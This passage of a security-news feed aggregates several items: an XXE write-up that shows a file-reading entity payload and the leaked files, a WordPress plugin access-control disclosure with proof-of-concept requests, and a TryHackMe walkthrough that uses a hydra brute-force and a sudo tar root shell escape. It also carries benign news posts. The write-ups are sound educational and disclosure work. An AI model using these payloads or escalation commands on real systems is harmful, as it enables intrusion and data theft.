"file:///C:/windows/win.ini"&gt;]&gt;<br>&lt;v&gt;&amp;xxe;&lt;/v&gt;<br>------xxeboundary--</pre><p>Response:</p><pre>HTTP/1.1 200 OK<br>Content-Type: application/json; charset=utf-8<br>X-Content-Type-Options: nosniff<br>Strict-Transport-Security: max-age=31536000; includeSubDomains<br>X-Frame-Options: SAMEORIGIN<br><br>{"uploadResult":"; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1\r\n","responseCode":"1"}</pre><p><strong>Read 2: `C:\Windows\System32\drivers\etc\hosts`</strong></p><p>Identical request structure, `TARGET_FILE` changed. Response:</p><pre>{"uploadResult":"# Copyright (c) 1993-2009 Microsoft Corp.\r\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\r\n...[REDACTED]...\r\n# localhost name resolution is handled within DNS itself.\r\n#\t127.0.0.1       localhost\r\n#\t::1             localhost\r\n","responseCode":"1"}</pre><p><strong>Read 3: `C:\Windows\system.ini`</strong></p><pre>{"uploadResult":"; for 16-bit app support\r\n[386Enh]\r\nwoafont=[REDACTED]\r\n...\r\n[drivers]\r\nwave=mmdrv.dll\r\ntimer=timer.drv\r\n[mci]\r\n","responseCode":"1"}</pre><p>Three reads. Three different file paths. Same exploit, same endpoint, same unauthenticated access. Reproducible on every run.</p><h3>What Comes After the Door Opens</h3><p>I want to be honest about what finding a vulnerability actually feels like, because the stories we tell each other often skip this part.</p><p>It doesn’t feel triumphant. Not immediately. It feels more like the moment after you’ve been carrying a question for a long time and the answer finally arrives. There’s relief, and then immediately, a new set of questions. — <em>How deep does this go? What else can I read? Can I turn this into something more?</em></p><p>I tried to push further. The natural next target was the application’s configuration file, `web.config` in ASP.NET, which would contain database credentials and API keys in plaintext. But `web.config` is itself an XML file. When its content lands inside the cell value tag, the XML parser sees `&lt;connectionStrings&gt;` and `&lt;appSettings&gt;` as XML markup rather than cell content, and throws a parse error. The file doesn’t come through.</p><p>There’s a workaround for this: the external DTD with CDATA wrapping technique. But that requires the server to make an outbound HTTP request to a server you control, to fetch the DTD. The load balancer blocked all outbound connections from the backend. Not one callback received. That path was closed. Three hundred guesses at the physical deployment path, across different drives, different naming conventions, different enterprise folder structures. None of them landed. Without the physical path, you can’t target application-specific files.</p><p><em>The vulnerability stayed where it was. An unauthenticated, reliable, in-band arbitrary file read. High (8.6) severity accepted.</em></p><h3>The Fix</h3><p>The root cause is a single configuration decision that was never made. In .NET, XML parsers have external entity resolution <strong>enabled by default</strong>. The developer who wrote the XLSX processing code used the library without reading the security section of the documentation, and the insecure default was never changed. The fix is two lines :</p><pre>var settings = new XmlReaderSettings {<br>    DtdProcessing = DtdProcessing.Prohibit,<br>    XmlResolver = null</pre><p>Or more completely: replace the custom XML parsing with a hardened XLSX library like EPPlus or ClosedXML that disables external entity resolution by design. Add authentication to the upload endpoint. Done.</p><p>That’s what this work is, at the end of it. Not a conquest. A conversation between a researcher and a system, mediated by a file format that turned out to have more to say than anyone expected.</p><p><em>The file answered back. The system is safer. The story continues</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=20dbb8161dd8" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/the-file-that-answered-back-xxe-hidden-in-cell-a2-20dbb8161dd8">The File That Answered Back — XXE Hidden in Cell A2</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.7.1-beta.2]]></title>
<description><![CDATA[OpenClaw 2026.7.1-beta.2]]></description>
<link>https://tsecurity.de/de/3646458/downloads/v202671-beta2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646458/downloads/v202671-beta2/</guid>
<pubDate>Sun, 05 Jul 2026 10:46:41 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw 2026.7.1-beta.2</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Found an Unauthenticated Attachment Disclosure Bug in a WordPress Support Plugin — and a…]]></title>
<description><![CDATA[I Found an Unauthenticated Attachment Disclosure Bug in a WordPress Support Plugin — and a Duplicate Taught Me What “Fixed” Really MeansAuthor: Shikhali JamalzadeGitHub: alisalive · LinkedIn: camalzadsDisclosure Notice: This research was conducted entirely in an isolated, locally-hosted Docker te...]]></description>
<link>https://tsecurity.de/de/3646320/hacking/i-found-an-unauthenticated-attachment-disclosure-bug-in-a-wordpress-support-plugin-and-a/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646320/hacking/i-found-an-unauthenticated-attachment-disclosure-bug-in-a-wordpress-support-plugin-and-a/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:15 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7xavI1_sTm7sTpNEO_Vf7A.png"></figure><h3>I Found an Unauthenticated Attachment Disclosure Bug in a WordPress Support Plugin — and a Duplicate Taught Me What “Fixed” Really Means</h3><h4><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br><strong>GitHub:</strong> <a href="https://github.com/alisalive">alisalive</a> · <strong>LinkedIn:</strong> <a href="https://linkedin.com/in/camalzads">camalzads</a></h4><blockquote><strong><em>Disclosure Notice:</em></strong><em> This research was conducted entirely in an isolated, locally-hosted Docker test environment running a fresh install of WordPress and the publicly available “latest-stable” release of the plugin in question, downloaded directly from the official WordPress.org plugin repository. No live, production, or third-party website was accessed, scanned, or tested at any point. All file contents shown are synthetic test data created solely for this research. The affected plugin’s name and the exact route are intentionally redacted here, because the underlying issue is currently being tracked through coordinated disclosure and may not yet be fully patched at the time of writing. This write-up is published strictly for educational purposes.</em></blockquote><h3>Background</h3><p>Most of my CVE research starts from one theory: a plugin whose developers made one authorization mistake will usually have made others, and the categories that leak most often are the ones tied to user-owned objects — tickets, attachments, profiles, orders. Broken Access Control is, by a wide margin, the single most productive class in the WordPress plugin ecosystem, and unauthenticated variants sit at the top of that list.</p><p>This time the target was a <strong>support-desk / ticketing plugin</strong> — the kind of software where customers upload invoices, ID scans, contracts, and screenshots straight into a ticket. If the endpoint that serves those attachments doesn’t check <em>who</em> is asking, the impact isn’t abstract: it’s other people’s private documents.</p><p>What follows is a fully independent, fully reproducible finding — and the moment, after submission, when I learned it overlapped with a report already sitting in a vulnerability database’s pipeline. I’m publishing the technical breakdown anyway, because the methodology and the honest reconciliation with prior art are the actual point of doing this in public.</p><h3>Scope &amp; Method</h3><ul><li><strong>Target:</strong> A WordPress support/ticketing plugin (redacted), latest-stable from WordPress.org</li><li><strong>Environment:</strong> Local, isolated Docker stack — WordPress + MySQL 5.7</li><li><strong>Assessment Type:</strong> White-box source audit + black-box PoC validation</li><li><strong>Authorization:</strong> Self-authorized, isolated local research environment — no live targets</li><li><strong>Tools:</strong> grep, WP-CLI, curl, docker, MySQL CLI</li></ul><h3>Phase 1: Target Confirmation</h3><p>Before touching anything, I confirmed exactly what I was auditing: the plugin name, its version, that it was active, and the WordPress version underneath it. This is the first screenshot in every submission I make, because a reviewer needs to know the finding was validated against a real, current install — not a hypothetical.</p><pre>=== TARGET CONFIRMATION ===<br>Plugin:    &lt;redacted&gt; (latest-stable)<br>Version:   &lt;redacted — current release at time of testing&gt;<br>Active:    YES<br>WordPress: 7.0<br>Site URL:  http://&lt;local-docker&gt;:8080</pre><p>The critical detail here: I was testing the <strong>current</strong> version. Not an old release with a known history — the newest code the plugin ships today.</p><h3>Phase 2: Mapping the Attack Surface</h3><p>The plugin exposes its functionality through a REST namespace. I exported the source via SVN and mapped every route, paying special attention to the permission callbacks — the functions WordPress calls to decide whether a request is allowed <em>before</em> the handler runs.</p><pre>grep -n "RegisterRestRoute\|permission" &lt;source&gt;/api/v1/&lt;controller&gt;.php</pre><p>One route stood out immediately — the handler that serves ticket and reply <strong>file attachments</strong>:</p><pre>$this-&gt;RegisterRestRoute(<br>    'GET',<br>    'file-dl/(?P&lt;type&gt;[a-zA-Z0-9-]+)/(?P&lt;id&gt;[0-9_]+)/(?P&lt;file&gt;[^/]+)',<br>    [$this, "file_dl"]<br>);</pre><p>Three attacker-controlled segments — a type selector, a numeric identifier, and a filename — feeding a file-download handler. Exactly the shape of an IDOR, <em>if</em> the permission gate is weak. So I read the gate.</p><h3>Phase 3: Root Cause</h3><p>The route’s permission logic resolved, for this particular download route, to a single unconditional line:</p><pre>} elseif ($route == "file-dl") {<br>    return true;<br>}</pre><p>That’s the whole bug. The permission callback returns true for the attachment-download route <strong>unconditionally</strong> — no authentication check, no nonce, no verification that the requester owns the ticket the file belongs to. Once that callback returns true, WordPress hands the request straight to the download handler, which reads the identifier and filename from the URL and returns the file.</p><p>Because the callback never looks at the current user, there is no notion of “your ticket” versus “someone else’s ticket.” Every attachment is reachable by everyone — including an anonymous visitor with no account at all.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lpAnerehFINPi_d71dGXaQ.png"></figure><h3>Phase 4: Building an Isolated Test Environment</h3><p>To prove impact safely, I stood up a throwaway install rather than touching any live site: WordPress + MySQL 5.7 in Docker, the plugin installed from the dashboard, and a realistic victim scenario seeded by hand.</p><p>I created two synthetic victim artifacts, standing in for what a real customer would attach:</p><ul><li>A <strong>ticket attachment</strong> (type = T) containing a fake "confidential customer record."</li><li>A <strong>reply attachment</strong> (type = R) containing a fake "private invoice."</li></ul><pre>=== SETUP: victim ticket + reply attachments ===<br>[ticket attachment created — synthetic "customer record"]<br>[reply attachment created — synthetic "invoice"]<br>Files created: 2</pre><p>I also inserted the matching reply row into the plugin’s database table, because the reply-download path validates that a reply record exists before serving its file. This made the second attack vector reachable exactly as it would be on a real site.</p><h3>Phase 5: Proof of Concept</h3><h3>Vector 1 — Unauthenticated Ticket Attachment (type = T)</h3><p>From a session with <strong>no cookies, no auth header, no login</strong>, I requested the ticket attachment and filtered the output to show that the request carried no credentials and the server returned the file anyway:</p><pre>&gt; GET /wp-json/&lt;plugin&gt;/v1/ticket/file-dl/T/1/&lt;file&gt; HTTP/1.1<br>&gt; Host: &lt;local-docker&gt;<br>&lt; HTTP/1.1 200 OK<br>[SYNTHETIC CONFIDENTIAL RECORD RETURNED]</pre><p>No Cookie header. No Authorization header. HTTP 200, and the full attachment content in the response body.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Amwgj9qEjLNevJjkzXtbFg.png"></figure><h3>Vector 2 — Unauthenticated Reply Attachment (type = R)</h3><p>The reply path uses a compound {ticketId}_{replyId} identifier. Same anonymous session, same result:</p><pre>&gt; GET /wp-json/&lt;plugin&gt;/v1/ticket/file-dl/R/1_1/&lt;file&gt; HTTP/1.1<br>&gt; Host: &lt;local-docker&gt;<br>&lt; HTTP/1.1 200 OK<br>[SYNTHETIC PRIVATE INVOICE RETURNED]</pre><p>Two independent download paths, both fully unauthenticated.</p><h3>Integrity Proof</h3><p>A 200 response proves the endpoint answered — but I wanted to prove the anonymous request returned the <em>actual victim file</em>, byte for byte, not a placeholder or an error page. So I compared the MD5 of the file on disk with the MD5 of what the unauthenticated request pulled down:</p><pre>--- [A] File on server (victim's attachment) ---<br>254e7a2a21c6d0d55fbc11fc08e30c18   &lt;server-side file&gt;</pre><pre>--- [B] Content retrieved via unauthenticated request ---<br>254e7a2a21c6d0d55fbc11fc08e30c18   &lt;downloaded file&gt;</pre><p>Identical hashes. Byte-for-byte exfiltration, from an anonymous session, confirmed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lztI7rFSqfGIsOZPdtpkWg.png"></figure><h3>Why This Scales</h3><p>The identifiers are <strong>sequential integers</strong>. An attacker doesn’t need to guess — they increment. Combined with the fact that support tickets routinely carry personal data, invoices, and contracts, and that the plugin’s upload whitelist covers pdf, doc/docx, xls/xlsx, txt, and common image formats, a single unauthenticated loop over the ID space harvests attachments across every customer on the site.</p><p>Estimated severity: <strong>CVSS 3.1 7.5 (High)</strong> — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. Network-reachable, no privileges, no interaction, high confidentiality impact.</p><h3>The Reality Check</h3><p>Before public disclosure I did what I always do now: I checked the vulnerability databases and I contacted the vendor.</p><p>The vendor email went out first — a responsible-disclosure notice with a summary of the issue and a request for a secure contact, deliberately <em>without</em> the full PoC in the first message. Then I submitted the finding to a CNA with the complete technical detail and requested a CVE.</p><p>The response was: <strong>duplicate.</strong></p><p>Not a duplicate of the plugin’s older, public authorization issues — those were a different, integrity-only problem on a different function. This was a duplicate of a <strong>separate report already in the CNA’s pipeline</strong>, covering exactly this unauthenticated attachment-download route and exactly this “permission callback returns true” root cause, already tracked with the confidentiality impact of returning full attachment contents to anonymous callers.</p><p>Someone had gotten there first, by a matter of weeks, into a queue I couldn’t see.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/870/1*4qJhNuOGBEbGm_3ukmDEbA.png"></figure><h3>What I Was Told — and What It’s Worth</h3><p>Here’s the part that turned a rejection into something genuinely useful. The existing record was filed against an <strong>earlier version</strong>, and marked fixed in a later one. My finding reproduced on the <strong>current</strong> release — the one that was supposed to be patched.</p><p>The reviewer’s response was precise, and I’m quoting the substance of it because it reframed the whole finding for me: my confirmation that the issue <strong>still reproduces on the current version</strong>, together with the byte-for-byte MD5 proof, would be used to <strong>extend the affected-version range</strong> on the existing entry beyond the version it was originally filed against. Because it’s the same vulnerability and the same code path, it’s handled under the existing record rather than as a separate CVE.</p><p>So: no CVE with my name on it. But my independent reproduction demonstrated that a fix believed to close the issue <strong>did not</strong>, and that correction lands in the public record where it actually protects people. That’s not nothing. That’s the point of the work.</p><p>I want to be precise about what I’m claiming and what I’m not. I did not discover a novel bug here — I independently rediscovered a known one and proved it was still live where it was believed dead. The value isn’t novelty; it’s verification. Those are different contributions, and conflating them would be dishonest.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XYv4UU9Un9ZCuQuy78rK9w.png"></figure><h3>Attack Chain Summary</h3><pre>[Attacker — no credentials, no prior session]<br>        │<br>        ▼<br>[1] Map REST routes; find attachment-download handler<br>        │<br>        ▼<br>[2] Read permission callback → returns true unconditionally for file-dl<br>        │<br>        ▼<br>[3] Seed victim ticket + reply attachments in isolated Docker install<br>        │<br>        ▼<br>[4] GET file-dl/T/&lt;id&gt;/&lt;file&gt;  → HTTP 200, ticket attachment (no auth)<br>        │<br>        ▼<br>[5] GET file-dl/R/&lt;id&gt;/&lt;file&gt;  → HTTP 200, reply attachment (no auth)<br>        │<br>        ▼<br>[6] MD5(server file) == MD5(downloaded file) → byte-for-byte exfiltration<br>        │<br>        ▼<br>[7] Sequential IDs → enumerate → harvest attachments across all tickets</pre><h3>What This Taught Me</h3><p><strong>A “fixed in X” label is a claim, not a guarantee.</strong> The most valuable thing I did in this entire audit was test the <em>current</em> version instead of assuming the changelog was true. The issue was marked fixed; it wasn’t. Independent reproduction against the latest release is how that gets caught.</p><p><strong>Duplicate-by-pipeline is invisible until it isn’t.</strong> I checked every public database before submitting, and it was clean — because the report that duplicated mine wasn’t public yet. You cannot fully de-risk this. What you <em>can</em> do is target less-crowded plugins: the more popular the software, the more researchers are already circling it. Two of my findings that week collided with pipeline reports; both were popular plugins. The niche ones didn’t collide.</p><p><strong>Precision about your own contribution is a security skill.</strong> “I found a new bug,” “I independently rediscovered a known bug,” and “I proved a known bug wasn’t actually fixed” are three different sentences with three different truth values. Picking the correct one — especially when the flattering one is right there — is part of doing this honestly.</p><p><strong>The process transfers regardless of the outcome.</strong> Standing up an isolated environment, tracing an unauthenticated entry point to confirmed impact, building two independent PoCs, proving exfiltration with a hash rather than a screenshot alone — that skill set is identical whether the audit ends in a CVE or a “thanks, we’ll extend the range.”</p><p>If you found this useful, feel free to connect on <a href="http://linkedin.com/in/camalzads">LinkedIn </a>or check out my tools on <a href="http://github.com/alisalive">GitHub</a>.</p><p><em>All testing was conducted in an isolated, locally-hosted environment using a publicly available plugin release. No live or third-party systems were accessed at any point during this research. The plugin name and exact route are redacted pending completion of coordinated disclosure.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=435e86868d04" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/i-found-an-unauthenticated-attachment-disclosure-bug-in-a-wordpress-support-plugin-and-a-435e86868d04">I Found an Unauthenticated Attachment Disclosure Bug in a WordPress Support Plugin — and a…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Bounty Hacker: The FTP Server Was Talking. I Just Listened.]]></title>
<description><![CDATA[The web server was a dead end. The real story was sitting on port 21, waiting for anyone who didn’t need a password to find it.You’ve been challenged to prove you’re the most elite hacker in the solar system.The box doesn’t make it hard. It makes it honest. No CVEs, no rabbit holes, no bruteforce...]]></description>
<link>https://tsecurity.de/de/3646319/hacking/tryhackme-bounty-hacker-the-ftp-server-was-talking-i-just-listened/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646319/hacking/tryhackme-bounty-hacker-the-ftp-server-was-talking-i-just-listened/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:13 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>The web server was a dead end. The real story was sitting on port 21, waiting for anyone who didn’t need a password to find it.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/316/1*knji29G71d3amQj7E0184A.jpeg"></figure><p>You’ve been challenged to prove you’re the most elite hacker in the solar system.</p><p>The box doesn’t make it hard. It makes it honest. No CVEs, no rabbit holes, no bruteforce-for-hours nonsense. Just three ports, two text files, and a tar binary that GTFOBins knows very well.</p><p>The machine handed me everything. I just had to know where to look, and what to do when the first shell died immediately.</p><p>Let’s get into it.</p><h3>Reconnaissance</h3><pre>nmap -sC -sV -oN bountyhacker.nmap 10.0.0.5</pre><pre>21/tcp  open  ftp     vsftpd 3.0.5<br>22/tcp  open  ssh     OpenSSH 8.2p1<br>80/tcp  open  http    Apache 2.4.41</pre><p>Three ports. My first instinct was port 80, there’s usually something there. Visited the page, checked source, ran a quick directory scan.</p><p>Nothing. A static page with Cowboy Bebop flavor text and zero attack surface.</p><p>The web server was bait. Port 21 is where the box actually starts.</p><h3>FTP — Anonymous and Generous</h3><pre>ftp 10.0.0.5<br># Name: anonymous<br># Password: [blank]</pre><p>No credentials needed. Anonymous login accepted immediately.</p><pre>ls</pre><pre>locks.txt<br>task.txt</pre><p>Two files. Downloaded both:</p><pre>get locks.txt<br>get task.txt</pre><p>task.txt opened first, a note signed by <strong>lin</strong>. Not a hint. A username, handed directly.</p><p>locks.txt opened second, a long list of strings that looked like lock combinations. Passwords. A ready-made wordlist sitting on an open FTP server, written by the same person whose name was just signed on the note above it.</p><p>The FTP server just gave me a username and a password list in the same breath.</p><p>Time to use them.</p><h3>SSH Bruteforce — Hydra Does the Work</h3><p>Port 22 is open. Username is lin. Password is somewhere inside locks.txt. The math is simple:</p><pre>hydra -l lin -P locks.txt ssh://10.0.0.5 -t 4</pre><p>Hydra chews through the list. One password matches:</p><pre>[22][ssh] host: 10.0.0.5   login: lin   password: RedDr4gonSynd1cat3</pre><pre>ssh lin@10.0.0.5<br># RedDr4gonSynd1cat3</pre><p>Shell as lin. user.txt is right there in the home directory.</p><p>One flag down. The FTP server gave me everything I needed to get here. I just had to pick it up.</p><h3>Privilege Escalation — tar, GTFOBins, and a Shell That Didn’t Want to Stay</h3><pre>sudo -l</pre><pre>User lin may run the following commands:<br>    (root) NOPASSWD: /usr/bin/tar</pre><p>tar with sudo and no password. GTFOBins has this documented under shell escape, the checkpoint-exec technique abuses tar's --checkpoint-action flag to execute arbitrary commands mid-archive operation.</p><p>First attempt, straight from GTFOBins:</p><pre>sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh</pre><p>Shell spawned. Then died immediately.</p><p>The /bin/sh process didn't survive in this environment. Not uncommon, some shells drop instantly depending on how the session is configured. <em>The fix: tell it explicitly to stay alive and do something useful first.</em></p><pre>sudo tar -cf /dev/null /root/root.txt --checkpoint=1 --checkpoint-action=exec="bash -c 'cat /root/root.txt; exec /bin/bash'"</pre><p>This time: flag printed, bash stayed open, root shell confirmed.</p><pre>whoami<br>root</pre><p>The box didn’t expect anyone to refine the command. It expected copy-paste. I refined it.</p><p><em>Bounty Hacker is a room on TryHackMe. This writeup is for educational purposes only. All testing performed on dedicated lab infrastructure with explicit authorization.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=fb6d40204184" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-bounty-hacker-the-ftp-server-was-talking-i-just-listened-fb6d40204184">TryHackMe — Bounty Hacker: The FTP Server Was Talking. I Just Listened.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honest Government Ad | Palantir]]></title>
<description><![CDATA[The Government™ has made an ad about Palantir, and it's surprsingly honest and informative.    submitted by    /u/Altruistic_Level9640   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3646085/it-security-nachrichten/honest-government-ad-palantir/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646085/it-security-nachrichten/honest-government-ad-palantir/</guid>
<pubDate>Sun, 05 Jul 2026 04:07:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/Computersicherheit/comments/1unhjwp/honest_government_ad_palantir/"> <img src="https://external-preview.redd.it/uEj5Uz0UYHRCc7fT1tuUdtiiUNNiZXLvu9lKsBVJxjg.jpeg?width=320&amp;crop=smart&amp;auto=webp&amp;s=ec1187e1a51ef469a75abb470b91fe1d2824f191" alt="Honest Government Ad | Palantir" title="Honest Government Ad | Palantir"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>The Government™ has made an ad about Palantir, and it's surprsingly honest and informative.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Altruistic_Level9640"> /u/Altruistic_Level9640 </a> <br> <span><a href="https://youtube.com/watch?v=mBW9QCVDSjY&amp;si=6htM6RuOZsyy6jzt">[link]</a></span>   <span><a href="https://www.reddit.com/r/Computersicherheit/comments/1unhjwp/honest_government_ad_palantir/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honest Government Ad | Palantir]]></title>
<description><![CDATA[Author: thejuicemedia - Bewertung: 31399x - Views:211376 The Government™ has made an ad about Palantir, and it's surprsingly honest and informative.

👉 Take action: 
🔹 Townhall meeting on July 6:  https://events.humanitix.com/burning-palantir
🔹 GTFO of Coles: https://getup.org/palantir
🔹 GTFO of ...]]></description>
<link>https://tsecurity.de/de/3645785/it-security-nachrichten/honest-government-ad-palantir/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645785/it-security-nachrichten/honest-government-ad-palantir/</guid>
<pubDate>Sat, 04 Jul 2026 21:21:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: thejuicemedia - Bewertung: 31399x - Views:211376 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/mBW9QCVDSjY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The Government™ has made an ad about Palantir, and it's surprsingly honest and informative.<br />
<br />
👉 Take action: <br />
🔹 Townhall meeting on July 6:  https://events.humanitix.com/burning-palantir<br />
🔹 GTFO of Coles: https://getup.org/palantir<br />
🔹 GTFO of NHS: https://you.38degrees.org.uk/petitions/stop-palantir-taking-over-our-public-services <br />
🔹 USA: https://purgepalantir.com/take-action<br />
<br />
👉 Help us keep Governments honest:<br />
🔹 Become a Patron: https://www.patreon.com/thejuicemedia <br />
🔹 Buy a t-shirt: https://shop.thejuicemedia.com<br />
🔹 Buy us a coffee: https://ko-fi.com/thejuicemedia<br />
🔹 Other options: https://www.thejuicemedia.com/support/<br />
<br />
👉 CREDITS <br />
🔹 Produced by Patrons of The Juice Media <br />
🔹 Written by Giordano for The Juice Media <br />
🔹 Performed by Luca Banjo <br />
🔹 Brawndo vfx by Brent Cataldo<br />
🔹 Thanks to Tom, Chris and Dbot for script assistance<br />
🔹 Thanks to Jamie for lending us his hunting gear!<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE vendor stats by Greg Kroah-Hartman]]></title>
<description><![CDATA[CVE issue stats for the first 6 months of the year, by vendor, sorted by quantity:  2308 "vendor": "LCVE issue stats for the first 6 months of the year, by vendor, sorted by quantity: 2308 "vendor": "Linux", 1752 "vendor": "Google", 1308 "vendor": "n/a", 843 "vendor": "Microsoft", 495 "vendor": "...]]></description>
<link>https://tsecurity.de/de/3644654/linux-tipps/cve-vendor-stats-by-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644654/linux-tipps/cve-vendor-stats-by-greg-kroah-hartman/</guid>
<pubDate>Sat, 04 Jul 2026 04:09:22 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>CVE issue stats for the first 6 months of the year, by vendor, sorted by quantity:</p> <pre><code> 2308 "vendor": "LCVE issue stats for the first 6 months of the year, by vendor, sorted by quantity: 2308 "vendor": "Linux", 1752 "vendor": "Google", 1308 "vendor": "n/a", 843 "vendor": "Microsoft", 495 "vendor": "OpenClaw", 445 "vendor": "Oracle Corporation", 395 "vendor": "Adobe", 340 "vendor": "Red Hat", 310 "vendor": "Apache Software Foundation", 284 "vendor": "Apple", ....and the original link can be found here : https://social.kernel.org/objects/4e81c982-6b6f-4645-88f6-947589f71b1d </code></pre> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/unixbhaskar"> /u/unixbhaskar </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1umafxl/cve_vendor_stats_by_greg_kroahhartman/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1umafxl/cve_vendor_stats_by_greg_kroahhartman/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gaze | Facial authentication for Linux (sudo, lock screen, GDM), on-device]]></title>
<description><![CDATA[We built Gaze (v0.2.1), a facial authentication system for Linux. It hooks into PAM, so it works for sudo, the lock screen, and GDM login. Everything runs on-device. No cloud, no account. It's been a slow build. v0.1.0 took about 3 months, and v0.2.0 landed roughly a month and a half after that. ...]]></description>
<link>https://tsecurity.de/de/3644646/linux-tipps/gaze-facial-authentication-for-linux-sudo-lock-screen-gdm-on-device/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644646/linux-tipps/gaze-facial-authentication-for-linux-sudo-lock-screen-gdm-on-device/</guid>
<pubDate>Sat, 04 Jul 2026 04:09:11 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>We built Gaze (v0.2.1), a facial authentication system for Linux. It hooks into PAM, so it works for <code>sudo</code>, the lock screen, and GDM login. Everything runs on-device. No cloud, no account.</p> <p>It's been a slow build. v0.1.0 took about 3 months, and v0.2.0 landed roughly a month and a half after that. We'd rather get things right than ship fast.</p> <p>What it does:</p> <ul> <li>PAM integration for <code>sudo</code>, <code>polkit</code>, and any PAM-aware auth stack</li> <li>Liveness anti-spoofing on by default. A local <code>MiniFASNet-V2</code> model checks the face crop after a match on the RGB path, and eye-motion analysis handles the IR path.</li> <li>Infrared camera support for Windows Hello-style IR cameras, including driving the IR emitter. You can enroll RGB and IR templates and combine them with hybrid policies: require both, either one, or fall back to IR when it's too dark.</li> <li>GNOME Shell extension for the lock screen, plus optional face unlock at GDM login</li> <li>Works with Hyprland (<code>hyprlock</code>), KDE Plasma, and LXQt alongside GNOME</li> <li>A libadwaita desktop app for enrolling, testing, and health checks</li> <li>DBus API (<code>com.gundulabs.Gaze</code>) if you want to build on top of it</li> <li>Multiple face profiles per user, so you can enroll a default, one with glasses, whatever varies</li> <li><code>gaze refine-face</code> to sharpen recognition in dim light or at odd angles</li> <li>Security levels from <code>low</code> to <code>maximum</code> that swap the detector/recognizer models and match threshold, plus a <code>custom</code> level if you want to tune it yourself</li> <li>Optional TPM 2.0 template encryption that seals your face templates to the machine, so a stolen disk can't read them</li> <li>Multi-user support (<code>gaze add-face work -u alice</code>)</li> <li><code>gaze doctor</code> for a quick health check, <code>gaze uninstall</code> for a clean removal</li> <li>Models download on first run and stay local under <code>/var/cache/gaze</code></li> </ul> <p>One-line install (Debian/Ubuntu/Fedora/Arch):</p> <p><code>sh curl -fsSL https://gaze.gundulabs.com/install.sh | sh </code></p> <p>One honest caveat: face recognition isn't perfect, so false accepts and rejects happen. Liveness and an IR camera raise the bar, but keep a password as a fallback and don't rely on Gaze as your only factor.</p> <p>Repo: <a href="https://github.com/GunduLabs/gaze">https://github.com/GunduLabs/gaze</a> Docs: <a href="https://gaze.gundulabs.com/">https://gaze.gundulabs.com</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/GunduLabs"> /u/GunduLabs </a> <br> <span><a 